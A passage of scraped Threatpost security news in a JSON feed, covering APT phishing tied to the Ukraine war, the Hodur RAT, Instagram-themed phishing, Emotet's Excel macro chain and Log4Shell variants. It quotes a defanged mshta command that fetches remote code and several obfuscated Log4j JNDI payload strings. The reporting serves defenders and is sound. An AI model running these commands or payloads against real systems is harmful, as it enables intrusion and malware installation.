ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there have been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:33", "description": "The Chinese advanced persistent threat (APT) Mustang Panda (a.k.a. Temp.Hex, HoneyMyte, TA416 or RedDelta) has upgraded its espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) \u2013 largely in and around Southeast Asia.\n\nFor one thing, the APT has deployed a brand-new, customized variant of an old but powerful remote-access tool (RAT) called PlugX (aka Korplug), according to researchers from ESET. They named this latest variant \u201cHodur,\u201d after a blind [Norse god](<https://en.wikipedia.org/wiki/H%C3%B6%C3%B0r>) known for slaying his thought-to-be-invulnerable half-brother Baldr.\n\nBeyond that, Mustang Panda has developed a complex array of tactics, techniques and procedures (TTPs) to maximize the efficacy of its attacks.\n\nESET researchers noted, \u201cEvery stage of the deployment process utilizes anti-analysis techniques and control-flow obfuscation.\u201d\n\nThe cyberespionage campaign dates back to at least last August and is still ongoing, according to ESET, and is targeting mainly governments and NGOs. Most victims are located in East and Southeast Asia, but there are outliers in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan).\n\nThe attacks begin with social-engineering emails or watering-hole attacks, researchers said.\n\n\u201cThe compromise chain includes decoy documents that are frequently updated and relate to events in Europe [and the war in Ukraine],\u201d noted the team, in a [Wednesday posting](<https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/>). \u201cOne of the filenames related to this campaign is \u201cSituation at the EU borders with Ukraine.exe.\u201d\n\nOther phishing lures mention updated COVID-19 travel restrictions, an approved regional aid map for Greece, and a Regulation of the European Parliament and of the Council.\n\n\u201cThe final lure is a real document available on the European Council\u2019s website,\u201d according to ESET. \u201cThis shows that the APT group behind this campaign is following current affairs and is able to successfully and swiftly react to them.\u201d\n\n## What is Hodur?\n\nHodur derives [from PlugX](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/#:~:text=PlugX%20was%20first%20identified%20in,the%20infected%20system%3B%20and%20more.>), a RAT that \u201callows remote users to perform data theft or take control of the affected systems without permission or authorization. It can copy, move, rename, execute and delete files; log keystrokes; fingerprint the infected system; and more.\u201d\n\nPlugX is one of the oldest malware families around, having existed in some form or another since 2008, with a rise in popularity in the [mid-2010s](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>). Malware that old won\u2019t cut it these days, which is why Mustang Panda has constantly [iterated](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) on it. Even just a few weeks ago, researchers from Proofpoint [discovered](<https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european>) an upgrade \u201cchanging its encoding method and expanding its configuration capabilities.\u201d\n\nAccording to ESET, the new variant \u201cmostly lines up with other Korplug variants, with some additional commands and characteristics.\u201d It for instance closely resembles another Norse-themed variant \u2013 Thor \u2013 [discovered](<https://unit42.paloaltonetworks.com/thor-plugx-variant/>) in 2020.\n\n## Sophisticated Attack Chain\n\nHodur itself is hardly the star of the show: Mustang Panda\u2019s campaign features literally dozens of TTPs designed to establish persistence, collect data and evade defenses.\n\nAs mentioned, the campaign begins simply, as the group uses current events to phish their targets. For example, last month, Proofpoint discovered it puppeteering a NATO diplomat\u2019s email address to send out .ZIP and .EXE files titled \u201cSituation at the EU borders with Ukraine.\u201d\n\nIf a target falls for the bait, a legitimate, validly signed, executable vulnerable to DLL search-order hijacking, a malicious DLL, and an encrypted Hodur file are deployed on the target machine.\n\n\u201cThe executable is abused to load the module, which then decrypts and executes the\u2026RAT,\u201d explained researchers. \u201cIn some cases, a downloader is used first to deploy these files along with a decoy document.\u201d\n\nMustang Panda\u2019s campaigns then frequently use custom loaders for shared malware including Cobalt Strike, Poison Ivy, and now, Hodur. Then things get interesting. ESET analysts tallied a total of 44 MITRE ATT&amp;CK techniques deployed in this campaign. Most interesting are the 13 different methods of obfuscating or otherwise evading cybersecurity tools and detection.\n\nFor example, the ESET blog noted that \u201cdirectories created during the installation process are set as hidden system directories,\u201d and \u201cfile and directory names match expected values for the legitimate app that is abused by the loader.\u201d\n\nAnd, the malware gaslights you because \u201cscheduled tasks created for persistence use legitimate-looking names,\u201d and \u201cwhen writing to a file, Korplug sets the file\u2019s timestamps to their previous values.\u201d\n\n## **Who\u2019s Behind Mustang Panda?**\n\nCybersecurity analysts have been tracking Mustang Panda [since 2017](<https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda>), when they first started using Mongolian-themed phishing tactics to conduct espionage on targets in Southeast Asia. Still, there\u2019s much we don\u2019t know about the group.\n\nThe depth and complexity of their TTPs puts Mustang Panda more in the company of state-sponsored groups than criminal ones. So \u201cit is possible, though unproven, that they are state-sponsored or at least state-sanctioned,\u201d wrote Mike Parkin, senior technical engineer at Vulcan Cyber, via email.\n\nHistorically, the group has kept to Southeast Asia, with one notable exception \u2013 [the Vatican](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) \u2013 in 2020. The vast majority of targets in ongoing campaigns have, indeed, been located in Mongolia and Vietnam, followed closely by Myanmar. However, as mentioned, the list also includes select entities in Europe and Africa, which muddies the picture a bit.\n\n\u201cThe target distribution is interesting,\u201d Parkin concluded. \u201cThere isn\u2019t enough information publicly available here to determine the attacker\u2019s ultimate agenda.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T14:08:06", "type": "threatpost", "title": "Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T14:08:06", "id": "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "href": "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T14:21:33", "description": "A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. life insurance company headquartered in New York, researchers have revealed.\n\nAccording to a [report](<https://www.armorblox.com/blog/the-email-bait-and-phish-instagram-phishing-attack>) published by Armorblox on Wednesday, the attack combined brand impersonation with social engineering and managed to bypass Google\u2019s email security by using a valid domain name, eventually reaching the mailboxes of hundreds of employees.\n\n## Scam Looked Identical to Instagram\n\nThe attack began with a simple email. Disguised as an alert from Instagram\u2019s technical support team, it indicated that the recipient\u2019s account was under threat of deactivation. The intention, according to the report, was \u201cto create a sense of urgency while instilling trust in the sender.\u201d\n\n\u201cYou have been reported for sharing fake content in your membership,\u201d read the body of the email. \u201cYou must verify your membership. If you can\u2019t verify within 24 hours your membership will be permanently deleted from our servers.\u201d This message fostered a sense of urgency, to goad the unsuspecting into clicking on a malicious \u201caccount verify\u201d link. Targets who did so ended up on a landing page, where they were asked to submit their Instagram account login information. That information would go straight to the malicious actor, of course, unbeknownst to the target themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16092345/instagram-phishing-email-e1647437038569.png>)\n\nInstagram phishing email. Source: Armorblox.\n\nAt no point did any of these steps \u201clook to be malicious to the common end user, and every touch point, from the email to the account verification form, include Meta and Instagram branding and logos,\u201d the researchers noted.\n\nThe attackers certainly left clues along the way. They made grammar, spelling and capitalization errors in the body of the phishing email. In the sender field, the \u201cI\u201d in \u201cInstagram Support\u201d was, in fact, an \u201cL.\u201d And the email domain itself \u2013 membershipform@outlook.com.tr \u2013 clearly didn\u2019t come from Instagram.\n\nStill, the domain itself was perfectly legitimate \u2013 allowing it to bypass traditional spam filters \u2013 and, the researchers explained, \u201cthe sender crafted a long email address, meaning that many mobile users would only see the characters before the \u2018@\u2019 sign, which in this case is \u2018membershipform\u2019 \u2013 one that would not raise suspicion.\u201d\n\n## How to Defend Yourself\n\nJust a few weeks ago, cyberattackers [impersonated](<https://threatpost.com/cyberattackers-docusign-steal-microsoft-outlook-logins/178613/>) the DocuSign e-signature software to steal Microsoft account credentials from a U.S. payment solutions company. In that case, too, hundreds of employees were exposed as a result of dutiful brand impersonation, clever social engineering and a valid email domain that bypassed traditional security measures.\n\nPerhaps these two campaigns were identified and stopped, but what about the next one? Or the one after that? Or other campaigns we haven\u2019t heard about, because they weren\u2019t successfully identified by a security team?\n\nArmorblox\u2019s report suggested four main areas where employees can focus to protect themselves against phishing.****\n\n * **Avoid opening emails that you are not expecting**\n * **Augment native email security to stop socially engineered attacks**\n * **Watch out for targeted attacks**\n * **Follow multi-factor authentication and password management best practices**\n\n\u201cTo protect against these attacks, employees should be educated on the value of their email accounts,\u201d wrote Erich Kron of KnowBe4, via email. \u201cIn addition, employees need to understand the danger of reusing passwords and using simple passwords to secure accounts both personally and within the organization.\u201d\n\nEven one employee\u2019s slip-up can cause major problems across an organization, followed by other organizations along a supply chain. \u201cTake caution when using business credentials to login across multiple apps,\u201d wrote Armorblox researchers, \u201cespecially social apps that cross over into personal use. The convenience may be tempting; however, it only takes one time for both your sensitive personal and business data to risk exposure.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T04:00:47", "type": "threatpost", "title": "Phony Instagram \u2018Support Staff\u2019 Emails Hit Insurance Company", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T04:00:47", "id": "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "href": "https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T13:47:16", "description": "The infamous Emotet malware has switched tactics yet again, in an email campaign propagating through malicious Excel files, researchers have found.\n\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware, which is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious work, they [wrote in a report](<https://unit42.paloaltonetworks.com/new-emotet-infection-method/>) published online Tuesday.\n\n\u201cEmotet\u2019s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,\u201d Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.\n\nThe new attack vector\u2014discovered on Dec. 21 and still active\u2013delivers an Excel file that includes an obfuscated Excel 4.0 macro through socially engineered emails.\n\n\u201cWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload,\u201d researchers wrote.\n\n## **The Malware That Won\u2019t Die**\n\nEmotet started life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, at one point existing as a botnet that held more than 1.5 million machines under its control, according to Check Point Software. Typical consequences of TrickBot infections are bank-account takeover, high-value wire fraud and ransomware attacks.\n\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion dollars, researchers have said.\n\nThen, Emotet appeared to be [put out of commission](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. However, it resurfaced [last November](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) on the back of frequent partner-in-crime [TrickBot](<https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/>) \u2014 and now continues to [be a threat.](<https://threatpost.com/emotets-behavior-spread-are-omens-of-ransomware-attacks/176845/>)\n\nSince its return, Emotet has used [thread hijacking](<https://threatpost.com/emotet-returns-100k-mailboxes/162584/>) and other types of tactics as part of novel attack methods..\n\n\u201cThis technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts previously infected with Emotet,\u201d Unit 42 researchers wrote. \u201cThe botnet uses this stolen email data to create fake replies impersonating the original senders.\u201d\n\nExamples of this method included using links to install a fake Adobe Windows App Installer Package that were [reported](<https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/>) in December, researchers wrote.\n\n## **Using Excel Macros**\n\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\n\n\u201cIn some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,\u201d researchers explained. \u201cIn other cases, Emotet uses an Excel spreadsheet directly attached to the email.\u201d\n\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021. The email uses a lure heralding a \u201cnew announcement\u201d to a \u201cvaluable supplier\u201d and contains an encrypted .ZIP file in an attempt to bypass security systems, researchers wrote. It also includes the password to the .ZIP file in the email, so the victim can extract its contents.\n\n\u201cThe encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,\u201d researchers wrote \u201cThese macros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows host before the malicious content is activated.\u201d\n\nOnce that\u2019s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a remote HTML application that downloads and executes additional PowerShell code, researchers wrote.\n\n\u201cThe code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,\u201d they explained. \u201cThe deobfuscated command string that is executed is: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.\u201d\n\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\n\n\u201cThis second-stage PowerShell code\u2026contains 14 URLs to retrieve the Emotet binary,\u201d researchers wrote. \u201cThe script attempts each URL until an Emotet binary is successfully downloaded.\u201d\n\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is taken down, researchers said. The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted PE from its resource section, they added.\n\n## **Microsoft to Block Macros by Default**\n\nLast week, Microsoft [announced a plan](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) to disable all macros by default in some applications, acknowledging that the mechanism is one of the world\u2019s most popular ways to deliver malware.\n\n\u201cFor the protection of our customers, we need to make it more difficult to enable macros in files obtained from the internet,\u201d the computing giant noted. \u201cVBA macros obtained from the internet will now be blocked by default.\u201d\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft said. \u201cThe default is more secure and is expected to keep more users safe including home users and information workers in managed organizations.\u201d\n\nStarting in late April, instead of a button to \u201cenable macros,\u201d users will be prompted with a \u201clearn more\u201d button that will take them to additional information before they can activate macros within a document.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T13:39:33", "type": "threatpost", "title": "Emotet Now Spreading Through Malicious Excel Files", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T13:39:33", "id": "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "href": "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) 